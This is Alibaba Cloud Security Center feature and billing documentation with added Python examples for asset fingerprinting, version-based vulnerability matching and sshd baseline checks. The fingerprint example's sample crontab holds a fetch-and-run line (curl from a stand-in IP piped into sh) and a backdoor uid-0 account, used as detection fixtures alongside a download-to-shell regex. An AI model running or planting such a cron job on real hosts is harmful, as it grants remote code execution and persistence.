Features


Security Center is a cloud-native security platform that provides unified management for multicloud assets, prevents security risks, detects threats, responds to incidents, and enables traceability. It deploys a lightweight agent and uses agentless detection technology to deliver comprehensive security protection for your servers, containers, and cloud services. This helps you meet classified protection compliance requirements. This document helps you quickly understand Security Center’s core capabilities and billing models.

Core concepts

  • Edition: In the subscription (prepaid) model, the set of protection capabilities purchased for a server. Higher editions include more comprehensive features.

  • Protection Level: After you enable the pay-as-you-go feature for Host and Container Security, the set of protection capabilities assigned to a server. Higher protection levels include more comprehensive features.

  • Value-added Service: In the subscription (prepaid) model, a feature that you must purchase separately, such as vulnerability remediation, Agentic SOC, or container image security scanning.

Feature overview

Feature billing items

  • Subscription (upfront)

    • Billing characteristics: Pay a fixed cost monthly or yearly. This makes budget management easier.

    • Billable items: Fee = Edition fee + Value-added service fee (optional).

      • Edition fee: Security Center provides the Anti-virus, Advanced, Enterprise, Ultimate, and Value-added Plan editions. Higher-tier editions include more comprehensive features.

      • Value-added service fee: The fee for extra services, such as anti-ransomware or Agentic SOC.

  • Pay-as-you-go

    • Billing characteristics: Pay for what you use. This method is flexible and requires no upfront investment.

    • Billable items: Fee = Basic service fee + Feature usage fee.

      • Basic service fee: A fixed monthly fee that is charged when you enable any pay-as-you-go feature. By default, this includes DingTalk Robot, security reports, and Task Hub (Task Hub requires you to first enable or purchase the vulnerability fixing feature).

      • Feature usage fee: You are charged for the specific features you enable, such as Host and Container Security or Simple Log Service. Each feature can be enabled and billed separately.

Feature menu

  • Overview: Calculates an overall security score to quantify your asset security posture and identify weaknesses. Provides a dashboard for security posture visualization.

  • Asset Center: Provides a unified inventory and panoramic view of your cloud assets, containers, and servers. Supports collecting asset fingerprints such as accounts, ports, and processes for fine-grained asset inventory and visual management.

  • Risk Management: Scans and analyzes the Internet exposure of your assets. Provides vulnerability detection and management for systems, applications, and Web-CMS. Also performs baseline compliance checks and sends risk alerts based on classified protection standards and best practices.

  • Detection and Response: Monitors and sends real-time alerts for security threats, including abnormal processes, web shells, malware, anomalous logons, and unusual network connections. Supports attack attribution, threat analysis, and event handling to improve response efficiency.

  • Agentic SOC: Centrally collects and analyzes security logs and alerts from multicloud environments and multiple accounts. Uses built-in detection rules and AI models to discover threats automatically, and automated response playbooks for rapid handling.

  • Host Protection: Integrates an anti-virus engine and malicious behavior prevention rules to harden hosts with features such as anti-brute-force protection and core file monitoring. Provides advanced protection such as anti-ransomware and Web Tamper Protection.

  • Container Protection: Provides active runtime protection for containers, including blocking risky images, preventing container escapes, and protecting against file tampering. Uses network micro-segmentation and image signing policies to secure container clusters end to end.

  • Application Protection: Uses runtime application self-protection (RASP) to detect and block attacks from within applications, providing built-in, active security for your services.

  • System Settings: Provides configuration features such as the task hub, security reports, client management, access control, alert notifications, and multi-account management. Supports global customization of security policies and O&M.

Detailed features

Overview

  • Security Score

    • Feature description: This feature provides a comprehensive assessment of your cloud assets for both the China and international sites. It generates a health index on a scale of 0 to 100 by dynamically deducting points based on the real-time security status of your assets, such as alert events and configuration defects. A higher score indicates a better security posture. The index directly reflects existing security risks and the amount of remediation required.

    • Edition support: Supported by default in all editions.

  • Security Posture Dashboard

    • Feature description: The Security Posture Dashboard transforms and visualizes security attack and defense data. It provides a comprehensive view of your current network security posture across three dimensions: the security status of your cloud assets, external attacks, and emerging threats. This helps you understand your security situation, promptly identify and resolve issues, and improve security management efficiency.

    • Edition support:

      • Subscription: Advanced, Enterprise, and Ultimate; requires the purchase of the Security Dashboard value-added service.

      • Pay-as-you-go: Not supported.

Assets

  • Cloud Asset Overview

    • Feature description: Provides a panoramic view of your cloud assets, network topology, security score, and asset security risks. It serves as a unified entry point for managing the security of your cloud assets.

    • Edition support:

      • Subscription: Enterprise and Ultimate.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

  • Container Asset Overview

    • Feature description: Provides security visualization and management capabilities for clusters, containers, images, and applications. It also displays the network topology of your cloud container assets, helping you manage container security more efficiently.

    • Edition support:

      • Subscription: Ultimate only.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Hosts and Container Protection.

  • Server List

    • Feature description: Displays information about the security status of all your servers, including protection status, group, region, and virtual private cloud (VPC) statistics.

    • Edition support: Supported by default in all editions.

  • Asset Fingerprint Investigation

    • Feature description: Collects the following fingerprint data:

      • Account: Collects server account and permission information to inventory privileged accounts and detect privilege escalation.

      • Port: Collects and displays port listener information, allowing you to inventory open ports.

      • Process: Collects and displays process snapshot information, allowing you to inventory legitimate processes and detect abnormal ones.

      • Middleware: Collects middleware information to help you understand the middleware present on your assets.

      • Database: Collects database information to help you understand the databases present on your assets.

      • Web Service: Collects web service information to help you understand the web services present on your assets.

      • Software: Inventories installed software, allowing you to quickly locate affected assets when a high-risk vulnerability is discovered.

      • Scheduled Task: Collects scheduled task information, allowing you to promptly inventory the task paths on your assets.

      • Startup Item: Collects startup item information, allowing you to quickly locate the corresponding startup item when handling vulnerabilities.

      • Kernel Module: Collects kernel module information, allowing you to quickly locate the corresponding kernel module when handling vulnerabilities.

      • Website: Collects website information from your servers, helping you understand the details of the websites on your assets.

      • IDC Probe Finding: If an IDC probe is configured on an IDC server, this feature displays information about other IDC servers detected within the data center, helping you understand the basic situation of servers in your IDC.

    • Edition support:

      • Subscription: Enterprise and Ultimate only.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.
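The Account, Port, and Scheduled Task fingerprints above come down to parsing a handful of well-known files. The following Python collector is an added illustration, not Security Center's agent code: it parses constructed /etc/passwd, /proc/net/tcp and crontab content and flags the findings an analyst would look at first, namely a second uid-0 account, a service listening on all interfaces that is not on an allow list, and a cron job that pipes a download into a shell. The file contents, the allow list (only 22/tcp) and the finding rules are assumptions made for the example.

```python
"""Host asset-fingerprint collector (added example, not Security Center's agent).

Parses the Linux sources an agent reads for the Account, Port and Scheduled
Task fingerprints (/etc/passwd, /proc/net/tcp, a crontab) and turns them
into an inventory plus findings. Inputs are strings so the constructed
sample below runs offline; on a live host, read the files instead.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Account:
    name: str
    uid: int
    shell: str


@dataclass
class Listener:
    ip: str
    port: int
    uid: int


@dataclass
class Fingerprint:
    accounts: list = field(default_factory=list)
    listeners: list = field(default_factory=list)
    cron: list = field(default_factory=list)
    findings: list = field(default_factory=list)


def parse_passwd(text):
    """name:pw:uid:gid:gecos:home:shell -> Account list."""
    accounts = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7 and not line.startswith("#"):
            accounts.append(Account(f[0], int(f[2]), f[6]))
    return accounts


def _hex_ipv4(h):
    """/proc/net/tcp stores IPv4 as little-endian hex: 0100007F -> 127.0.0.1."""
    return ".".join(str(int(h[i:i + 2], 16)) for i in (6, 4, 2, 0))


def parse_proc_net_tcp(text):
    """Return sockets in state 0A (TCP_LISTEN) as Listener objects."""
    listeners = []
    for line in text.splitlines()[1:]:          # first line is the column header
        cols = line.split()
        if len(cols) >= 8 and cols[3] == "0A":
            ip, port = cols[1].split(":")
            listeners.append(Listener(_hex_ipv4(ip), int(port, 16), int(cols[7])))
    return listeners


def parse_crontab(text):
    """Return (schedule, command) pairs from crontab lines; comments are skipped."""
    tasks = []
    for line in text.splitlines():
        parts = line.strip().split(None, 5)
        if len(parts) == 6 and not parts[0].startswith("#"):
            tasks.append((" ".join(parts[:5]), parts[5]))
    return tasks


# "download something and pipe it straight into a shell" (assumed detection rule)
_NET_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def fingerprint(passwd, proc_net_tcp, crontab, allowed_ports=frozenset({22})):
    """Build the inventory and flag what an analyst would look at first."""
    fp = Fingerprint(parse_passwd(passwd), parse_proc_net_tcp(proc_net_tcp), parse_crontab(crontab))
    for a in fp.accounts:
        if a.uid == 0 and a.name != "root":        # second uid-0 account: classic backdoor
            fp.findings.append(f"uid 0 account other than root: {a.name}")
    for l in fp.listeners:
        if l.ip == "0.0.0.0" and l.port not in allowed_ports:   # exposed beyond loopback
            fp.findings.append(f"unexpected listener on all interfaces: {l.port}/tcp (uid {l.uid})")
    for _sched, cmd in fp.cron:
        if _NET_TO_SHELL.search(cmd):
            fp.findings.append(f"cron task pipes a download into a shell: {cmd}")
    return fp


# Constructed sample input (not captured from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup-svc:x:0:0::/home/backup-svc:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/bash
"""
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18765 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   999        0 22410 1 0000000000000000 100 0 0 10 0
   2: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 23001 1 0000000000000000 100 0 0 10 0
   3: 0A00020F:B5E2 5DB8D417:01BB 01 00000000:00000000 00:00000000 00000000  1001        0 23555 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.23/x.sh | sh
"""

if __name__ == "__main__":
    fp = fingerprint(SAMPLE_PASSWD, SAMPLE_TCP, SAMPLE_CRON)
    for f in fp.findings:
        print("FINDING:", f)
```

On a live host, pass the contents of the real files. The state filter (0A is TCP_LISTEN) and the little-endian address decoding are what make /proc/net/tcp usable without shelling out to ss; IPv6 listeners live in /proc/net/tcp6 and need the same treatment with 128-bit addresses.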

  • Security Check

    • Feature description: After you perform a one-click check, Security Center performs corresponding checks on the specified servers according to your configurations, such as vulnerability detection and baseline checks.

    • Edition support:

      • Subscription: Advanced, Enterprise, and Ultimate only.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

  • Container Assets

    • Feature description: Provides security status statistics and risk information for all your clusters, pods, containers, and images.

    • Edition support:

      • Subscription: Ultimate only.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Hosts and Container Protection.

  • Cloud Products

    • Feature description: Provides information related to the security status of your cloud products, including at-risk cloud products and statistics by cloud product category, such as Server Load Balancer and ApsaraDB RDS.

    • Edition support: Supported by default in all editions.

  • Websites

    • Feature description: Provides information related to the security status of all your websites, including root domain names, subdomains, and statistics on their asset risk status and alert counts.

    • Edition support: Supported by default in all editions.

  • Serverless Assets

    • Feature description: Supports runtime security risk detection for instances of Alibaba Cloud products that use a serverless architecture, such as Serverless App Engine (SAE) and serverless instances of Container Compute Service (ACS). It provides malicious file detection, vulnerability scanning, and compliance baseline checks.

    • Edition support:

      • Subscription: Not supported.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Serverless Asset Protection.

Risk Governance

  • Asset Exposure Analysis

    • Feature description: Scans and analyzes your Alibaba Cloud resources—including ECS instances, gateway assets, system components, and ports—to identify security risks and vulnerabilities exposed to the Internet. This helps you promptly discover and resolve issues to improve the security of your cloud resources.

    • Edition support:

      • Subscription: Enterprise and Ultimate only.

      • Pay-as-you-go: Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

  • Vulnerability Management

    • Feature description: Automatically discovers, assesses, and remediates security vulnerabilities on your servers. It provides automated vulnerability scanning and remediation solutions, replacing traditional manual patching methods, and is suitable for security operations and maintenance in large-scale server clusters.

      Scanning methods

      Vulnerability scanning supports two methods: manual scanning and automatic (periodic) scanning.

      • Manual scanning: Immediately assesses the vulnerability status of your servers.

      • Automatic scanning (periodic): Sets up periodic tasks to achieve automated and continuous vulnerability monitoring.

      Vulnerability remediation

      Vulnerability remediation supports the following three methods:

      • One-click fix: Security Center provides a one-click fix feature in the console. This feature helps you automate vulnerability fixing without needing to log on to servers and perform manual operations.

        Important

        The one-click fix feature is not supported for Application Vulnerability and Urgent Vulnerability.

      • Automatic fix: You can turn on the Automatic Vulnerability Remediation switch and configure automatic fixing tasks to periodically fix newly discovered vulnerabilities within a specified period.

        Important
        • Automatic fixing tasks depend on the one-click fix feature. If the current edition or vulnerability type does not support one-click fix, automatic fixing is also not supported.

        • Automatic fixing is supported only for non-kernel Linux system vulnerabilities.

      • Manual fix: If the current edition or vulnerability type does not support one-click fix, or if the Vulnerability Fix feature is not enabled, you must log on to the server and follow the fixing suggestions in the vulnerability details to manually fix the vulnerability.

      Vulnerability types and remediation solutions

      • Linux Software Vulnerability:

        • Detection method: Compares software versions against the official CVE vulnerability database using an OVAL matching engine to generate alerts for vulnerabilities in the currently used software versions.

        • Remediation solution: Supports one-click remediation and one-click rollback through automated snapshot capabilities, making vulnerability remediation safer.

      • Windows System Vulnerability:

        • Detection method: Synchronizes with the official Microsoft patch source to detect and send reminders for high-risk and impactful vulnerabilities.

        • Remediation solution: Supports one-click remediation. It automatically identifies prerequisite patches required for vulnerability fixes, resolving issues where servers cannot be patched due to missing prerequisites. It also provides reminders for vulnerabilities that require a system restart, improving the efficiency of fixing Windows system vulnerabilities.

      • Web-CMS Vulnerability:

        • Detection method: Monitors website directories, identifies common content management systems (CMS), and detects CMS vulnerabilities by comparing the CMS files against known vulnerable versions.

        • Remediation solution: Provides self-developed vulnerability patches and supports one-click remediation by replacing or modifying files to fix vulnerabilities at the source code level.

      • Urgent Vulnerability:

        • Detection method: Provides detection for urgent, newly disclosed vulnerabilities that emerge on the Internet.

        • Remediation solution: Does not support one-click remediation. You can log on to the server and fix the vulnerability manually based on the provided remediation suggestions.

      • Application Vulnerability:

        • Detection method: Provides detection capabilities for weak passwords in system services, system service vulnerabilities, and application service vulnerabilities.

        • Remediation solution: Does not support one-click remediation. You can log on to the server and fix the vulnerability manually based on the provided remediation suggestions.

    • Edition support:

      Subscription

      • Enterprise Edition and Ultimate Edition

        • Manual scan scope: all vulnerability types.

        • Periodic automatic scan scope: all vulnerability types.

        • Vulnerability fixing: supports fixing Linux, Windows, and Web-CMS vulnerabilities.

      • Advanced Edition

        • Manual scan scope: all vulnerability types except Application Vulnerability.

        • Periodic automatic scan scope: all vulnerability types except Application Vulnerability.

        • Vulnerability fixing: supports fixing Linux and Windows vulnerabilities.

      • Basic Edition, Value-added Edition, and Anti-virus Edition

        • Manual scan scope: Urgent Vulnerability only.

        • Periodic automatic scan scope: Linux Software Vulnerability, Windows System Vulnerability, and Web-CMS Vulnerability.

        • Vulnerability fixing: requires the separate Vulnerability Fix value-added service; see the Important note below.

      Pay-as-you-go

      • Host Protection and Hosts and Container Protection

        • Manual scan scope: all vulnerability types.

        • Periodic automatic scan scope: all vulnerability types.

        • Vulnerability fixing: requires activating the Vulnerability Fixing feature; see the Important note below.

      • Unprotected and Anti-Virus

        • Manual scan scope: Urgent Vulnerability only.

        • Periodic automatic scan scope: Linux Software Vulnerability, Windows System Vulnerability, and Web-CMS Vulnerability.

        • Vulnerability fixing: requires activating the Vulnerability Fixing feature; see the Important note below.

      Important

      For the Basic, Value-added, and Anti-virus editions and for all pay-as-you-go protection levels, One-click Fix is available only after you purchase the separate Vulnerability Fix value-added service (subscription) or activate the Vulnerability Fixing feature (pay-as-you-go). For instructions, see Purchase Vulnerability Fixing (Subscription) and Activate Vulnerability Fixing (Pay-as-you-go). After purchase or activation, fixing Linux and Windows vulnerabilities is supported.
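The Linux detection method described above matches installed package versions against the versions in which each issue was fixed. What makes that correct is the comparator: package versions are not strings, so "1.10" must sort after "1.9" and "1.0~rc1" before "1.0". The following Python is an added example, not Security Center's OVAL engine, that implements the rpmvercmp ordering and an EVR (epoch:version-release) matcher over a constructed inventory and constructed definitions; the package names, versions and EXAMPLE-000n ids are placeholders, not real advisories.

```python
"""Version-based vulnerability matching (added example, not Security Center's OVAL engine).

An OVAL-style definition says "package X is affected if the installed
epoch:version-release is lower than the fixed EVR". Getting that right
needs a real package-version comparator, not string comparison
("1.10" < "1.9" as strings). This implements the rpmvercmp(3) ordering.
"""
import re

_TOKEN = re.compile(r"\d+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Return -1, 0, 1 with rpmvercmp semantics: numeric runs compare as integers,
    alpha runs lexically, numeric beats alpha, '~' sorts before everything
    (so 1.0~rc1 < 1.0), and otherwise the string with segments left over is newer."""
    if a == b:
        return 0
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    for x, y in zip(ta, tb):
        if x == "~" or y == "~":
            if x != "~":
                return 1
            if y != "~":
                return -1
            continue
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit():
            return 1
        elif y.isdigit():
            return -1
        elif x != y:
            return 1 if x > y else -1
    if len(ta) == len(tb):
        return 0
    shorter = min(len(ta), len(tb))
    if len(ta) > len(tb):
        return -1 if ta[shorter] == "~" else 1
    return 1 if tb[shorter] == "~" else -1


def parse_evr(s):
    """'epoch:version-release' -> (epoch, version, release); epoch defaults to '0'."""
    epoch, sep, rest = s.partition(":")
    if not sep:
        epoch, rest = "0", s
    version, _, release = rest.partition("-")
    return epoch, version, release


def evrcmp(a, b):
    """Compare two EVR strings: epoch first, then version, then release."""
    for x, y in zip(parse_evr(a), parse_evr(b)):
        c = rpmvercmp(x, y)
        if c:
            return c
    return 0


def match(installed, definitions):
    """Return (definition id, package, installed EVR, fixed EVR) for every
    definition whose package is installed at an EVR below the fixed one."""
    hits = []
    for d in definitions:
        have = installed.get(d["package"])
        if have is not None and evrcmp(have, d["fixed"]) < 0:
            hits.append((d["id"], d["package"], have, d["fixed"]))
    return hits


# Constructed inventory and definitions; ids and EVRs are illustrative, not real advisories.
INSTALLED = {
    "openssl": "1:1.1.1k-7.el8",
    "bash": "4.4.20-4.el8",
    "curl": "7.61.1-30.el8",
}
DEFINITIONS = [
    {"id": "EXAMPLE-0001", "package": "openssl", "fixed": "1:1.1.1k-9.el8"},  # older release -> hit
    {"id": "EXAMPLE-0002", "package": "bash", "fixed": "4.4.19-14.el8"},      # newer version -> no hit
    {"id": "EXAMPLE-0003", "package": "curl", "fixed": "7.61.1-30.el8"},      # equal -> no hit
    {"id": "EXAMPLE-0004", "package": "nginx", "fixed": "1.14.1-9.el8"},      # not installed -> skip
]

if __name__ == "__main__":
    for hit in match(INSTALLED, DEFINITIONS):
        print("VULNERABLE:", hit)
```

Debian and Ubuntu hosts use the dpkg ordering, which differs in detail from rpmvercmp, so a scanner that covers both families needs both comparators. Matching on version alone also misses backported fixes unless the definition carries the distribution's own fixed release, which is why the detection compares full EVRs rather than upstream version numbers.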

  • Cloud Security Posture Management

    • Feature description: Cloud Security Posture Management (CSPM) identifies and manages security risks in cloud assets through automated configuration risk checks, baseline scanning, and attack path analysis. It identifies issues such as cloud product misconfigurations and server configuration defects, and offers remediation suggestions to mitigate the risks that stem from them.

      • Cloud Product Configuration Risk Check: Scans the configurations of your cloud assets to identify configuration risks in multicloud environments across three scenarios: identity and permission management, cloud product security best practices, and compliance checks.

      • Baseline Risk Check: Performs deep inspection at the host (server) operating system level. Based on industry standards and security specifications, it discovers and fixes issues such as weak passwords, insecure configurations, or missing important patches to meet compliance requirements.

        Server Baseline Check

        • Check description:

          • Performs security configuration scans on servers through a task-based model and generates alerts for items that do not meet the standards.

          • Supports custom detection policies, allowing you to set check items, check cycles, and the server groups to which they apply. Custom check scripts are not currently supported.

          • Supports custom weak password rules. Security Center periodically checks your servers against these rules according to your configured baseline policies and generates an alert if a match is found.

        • Detection scope:

          • High-risk exploits

            Detects risks such as unauthorized access vulnerabilities in CouchDB and Docker.

          • Container security

            Detects risks in Docker, Kubernetes master nodes, and Kubernetes nodes.

          • Classified protection compliance

            Checks for compliance with security baseline requirements for MLPS Level 3, MLPS Level 2, and international general security best practices.

          • Best security practices

            Checks for compliance with security baseline requirements for Linux, Windows, Redis, and more.

          • Weak passwords

            Detects weak passwords used for logging on to MongoDB, FTP, Linux systems, and more.

        Container Baseline Check

        • Check description: Provides security detection and alerts for container configurations. It checks the baseline configurations of Kubernetes master nodes and worker nodes against Alibaba Cloud's container security best practices.

        • Detection scope:

          • Alibaba Cloud Standard - Docker Security Baseline Check

            Based on Alibaba Cloud's best security practices for Docker baselines, it performs risk investigation and timely warnings from aspects such as Docker's security audit, service configuration, and file permissions.

          • Alibaba Cloud Standard - Kubernetes Master Security Baseline Check

            Baseline check for Kubernetes master nodes based on Alibaba Cloud's container security best practices.

          • Alibaba Cloud Standard - Kubernetes Node Security Baseline Check

            Baseline check for Kubernetes worker nodes based on Alibaba Cloud's container security best practices.

      • Attack Path Analysis: Analyzes attack paths and potential risk points in the cloud by correlating risks such as vulnerabilities, exposed assets, and misconfigurations. It also supports posture analysis and management of cloud product configurations and potential attack paths in a unified console.

    • Edition support:

      Subscription

      • Purchase the Advanced, Enterprise, or Ultimate Edition

        Important

        If you are using the Anti-virus Edition or a value-added plan and have not purchased the CSPM value-added service, you can detect and verify free check items for Cloud Service Configuration Risk. However, risk remediation, System Baseline Risks, and Attack Path are not supported.

        • Cloud Service Configuration Risk

          • Check items: free check items only. The Ultimate Edition additionally supports KSPM check items.

          • Operations: detection and verification. Remediation is not supported.

          • Quota consumption: none.

        • System Baseline Risks

          • Check items: Advanced Edition: weak password check items only. Enterprise Edition: all check items except container security check items. Ultimate Edition: all check items.

          • Operations: scanning, verification, and remediation.

          • Quota consumption: none; included in the edition fee.

        • Attack Path

          • Not supported.

      • Purchase the CSPM value-added service

        Important

        If you also purchase a service edition, feature support is as follows:

        • Advanced, Enterprise, or Ultimate Edition: the check items and operations supported for System Baseline Risks depend on your edition, as described above under "Purchase the Advanced, Enterprise, or Ultimate Edition". The edition does not affect the Cloud Service Configuration Risk and Attack Path features, which work as described in the following list.

        • Anti-virus Edition and value-added plan: the edition does not affect the System Baseline Risks, Cloud Service Configuration Risk, or Attack Path features, which work as described in the following list.

        • Cloud Service Configuration Risk

          • Check items: all check items (free and paid).

          • Operations: detection, verification, and remediation.

          • Quota consumption: free check items consume quota upon successful remediation; paid check items consume quota upon each successful scan, verification, or remediation.

        • System Baseline Risks

          • Check items: all check items.

          • Operations: detection, verification, and remediation.

          • Quota consumption: quota is consumed upon each successful scan, verification, or remediation.

        • Attack Path

          • Supported. Included in the paid CSPM service; does not consume additional quota.

      Pay-as-you-go

      You must enable the pay-as-you-go feature for CSPM.

      Important

      If you enable only the pay-as-you-go feature for Host and Container Security, you can detect and verify free check items for Cloud Service Configuration Risk. However, risk remediation, System Baseline Risks, and Attack Path are not supported.

      • Cloud Service Configuration Risk

        • Check items: all check items (free and paid).

        • Operations: detection, verification, and remediation.

        • Quota consumption: free check items consume quota upon successful remediation; paid check items consume quota upon each successful scan, verification, or remediation.

      • System Baseline Risks

        • Check items: all check items.

        • Operations: detection, verification, and remediation.

        • Quota consumption: quota is consumed upon each successful scan, verification, or remediation.

      • Attack Path

        • Supported. Included in the paid CSPM service; does not consume additional quota.
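The Server Baseline Check described above evaluates host configuration items against a policy and matches passwords against custom weak-password rules. The following Python is an added example, not Security Center's checker: it evaluates a handful of sshd_config items for a constructed weak configuration and a hardened one, and applies weak-password rules including a caller-supplied regex standing in for the console's custom rules. The check ids (sshd-01 to sshd-05), the policy thresholds, the sshd default values and both sample configurations are assumptions made for the example.

```python
"""Server baseline check with custom weak-password rules (added example, not
Security Center's checker).

Two details a first implementation usually gets wrong: a keyword absent from
sshd_config means the daemon default applies, so the check must evaluate the
default rather than skip the item; and sshd uses the first value it sees for
a keyword, with Match blocks applying only conditionally, so a global check
must not read conditional values as global ones.
"""
import re

# sshd defaults for the keywords checked below (OpenSSH 7.x and later; stated as assumptions).
SSHD_DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
    "x11forwarding": "no",
}


def parse_sshd_config(text):
    """Global sshd_config keywords -> {lowercased keyword: value}.
    First occurrence wins (as in sshd); parsing stops at the first Match block."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)   # 'Key value' or 'Key=value'
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        conf.setdefault(key, value)
    return conf


# Check items: (id, keyword, predicate on the effective value, remediation). Assumed policy.
BASELINE = [
    ("sshd-01", "permitrootlogin", lambda v: v == "no", "set PermitRootLogin no"),
    ("sshd-02", "passwordauthentication", lambda v: v == "no", "set PasswordAuthentication no"),
    ("sshd-03", "permitemptypasswords", lambda v: v == "no", "set PermitEmptyPasswords no"),
    ("sshd-04", "maxauthtries", lambda v: v.isdigit() and int(v) <= 5, "set MaxAuthTries 5 or lower"),
    ("sshd-05", "x11forwarding", lambda v: v == "no", "set X11Forwarding no"),
]


def check_baseline(sshd_config_text):
    """Return failed check items as (id, effective value, remediation)."""
    conf = parse_sshd_config(sshd_config_text)
    failed = []
    for cid, key, ok, fix in BASELINE:
        effective = conf.get(key, SSHD_DEFAULTS[key]).lower()   # absent keyword -> default
        if not ok(effective):
            failed.append((cid, effective, fix))
    return failed


# Small built-in dictionary; a real check uses a much larger list.
COMMON_WEAK = {"123456", "password", "p@ssw0rd", "admin", "qwerty", "root", "welcome1"}


def weak_password_reason(password, username, custom_rules=()):
    """Return why the password is weak, or None. custom_rules are regexes,
    standing in for the console's custom weak-password rules."""
    p = password.lower()
    if len(password) < 8:
        return "shorter than 8 characters"
    if p in COMMON_WEAK:
        return "in common weak-password list"
    if password.isdigit():
        return "digits only"
    if username and username.lower() in p:
        return "contains the account name"
    for rule in custom_rules:
        if re.search(rule, password):
            return f"matches custom rule {rule!r}"
    return None


# Constructed configurations (not from a real host).
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
# PasswordAuthentication is not set, so the default (yes) applies
MaxAuthTries 10
X11Forwarding yes
"""
HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
X11Forwarding no
Match User deploy
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for cid, value, fix in check_baseline(WEAK_SSHD_CONFIG):
        print(f"{cid}: effective value {value!r}; {fix}")
    print(weak_password_reason("admin123", "admin"))
```

The weak configuration fails four items, one of them (sshd-02) purely because the keyword is absent and the default is yes. The hardened configuration passes all five even though its Match block re-enables password authentication for one user: that value is conditional and must be judged separately, which is what stopping at Match achieves.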

  • AccessKey Leak Detection

    • Feature description: Monitors GitHub in real time to capture and determine whether publicly available source code contains AccessKey information for your Alibaba Cloud account.

    • Edition support: Supported by default in all editions.

  • Cloud Honeypot

    • Feature description: Deploys instantly to build active defense capabilities both on and off the cloud. By deploying honeypots at key points in an attacker's path, it diverts attacks, tricking attackers into targeting decoy applications and obtaining false data. This prolongs the attack, records the complete attack behavior for traceability, captures advanced and unknown attacks, and can even counter-attack. It provides security operators and defenders with a proactive defense advantage.

    • Edition support:

      • Subscription: Requires the purchase of the Cloud Honeypot value-added service.

      • Pay-as-you-go: Not supported.

  • Malicious File Detection

    • Feature description:

      • File Detection SDK: Leverages the Security Center multi-engine detection platform to provide an easy-to-use malicious file detection service. You only need to write a small amount of code to identify malicious files.

      • OSS File Detection: Combines cloud-native advantages to support the detection of files in Alibaba Cloud Object Storage Service (OSS) buckets, accurately identifying malicious files.

      • Malicious File Handling: When a risk file (such as a webshell, mining program, or Trojan) is detected in an ECS instance or OSS bucket, an alert is generated. The malicious file detection feature provides methods such as whitelisting, ignoring, and blocking access to handle the detected malicious files.

    • Edition support:

      • Subscription: Requires the purchase of the Malicious File Detection value-added service.

      • Pay-as-you-go: Requires enabling the pay-as-you-go feature for Malicious File Detection.

  • Log Analysis

    • Feature description: Centrally stores and manages security-related logs, providing a unified query and analysis entry point to help you quickly locate issues and meet compliance audit requirements.

      • Host logs: Records logon activity, process startups, account snapshots, DNS requests, and other logs. This can help you monitor user activity, system events, and application operations on your hosts to discover potential threats and optimize performance.

      • Security logs: Records security logs for vulnerabilities, baselines, security alerts, and cloud security posture management. This can help you observe security trends, improve security policies and defense mechanisms, and identify system weaknesses.

    • Edition support:

      • Subscription: Anti-virus, Advanced, Enterprise, and Ultimate; requires the purchase of the Log Analysis value-added service. For the specific log types supported by each edition, see Log types and field descriptions.

      • Pay-as-you-go: Enable the pay-as-you-go service for Log Management.

      Note

      The Log Analysis feature has been integrated into Log Management. For more information, see Log Analysis to Log Management Migration Guide and Log Management.

Detection and Response

Note

When you enable the Agentic SOC service, the Detection and Response feature menu will be moved under Agentic SOC.

  • Security Alerts

    • Feature description:

      • CWPP (Cloud Workload Protection Platform) security alerts:

        • Provides real-time detection of security alerts for hosts, containers, and cloud products. The detection scope covers activities such as processes, files, and network behavior on hosts and containers. Using threat detection models, it provides detection capabilities for issues including, but not limited to, abnormal process behavior, web shells, malware, vulnerability exploits, and container escapes. This helps you promptly discover security threats on your assets and maintain real-time awareness of your security posture.

        • In addition to various detection models, the precision defense model also provides interception capabilities for high-risk attack behaviors such as ransomware attacks, reverse shells, malicious command execution, loading of high-risk drivers, and planting of malicious files.

        • It also provides threat removal methods such as Virus Detection and Removal, Deep Cleanup, and Quarantine, and alert suppression methods such as Add to Whitelist and Ignore, to promptly handle security threats.

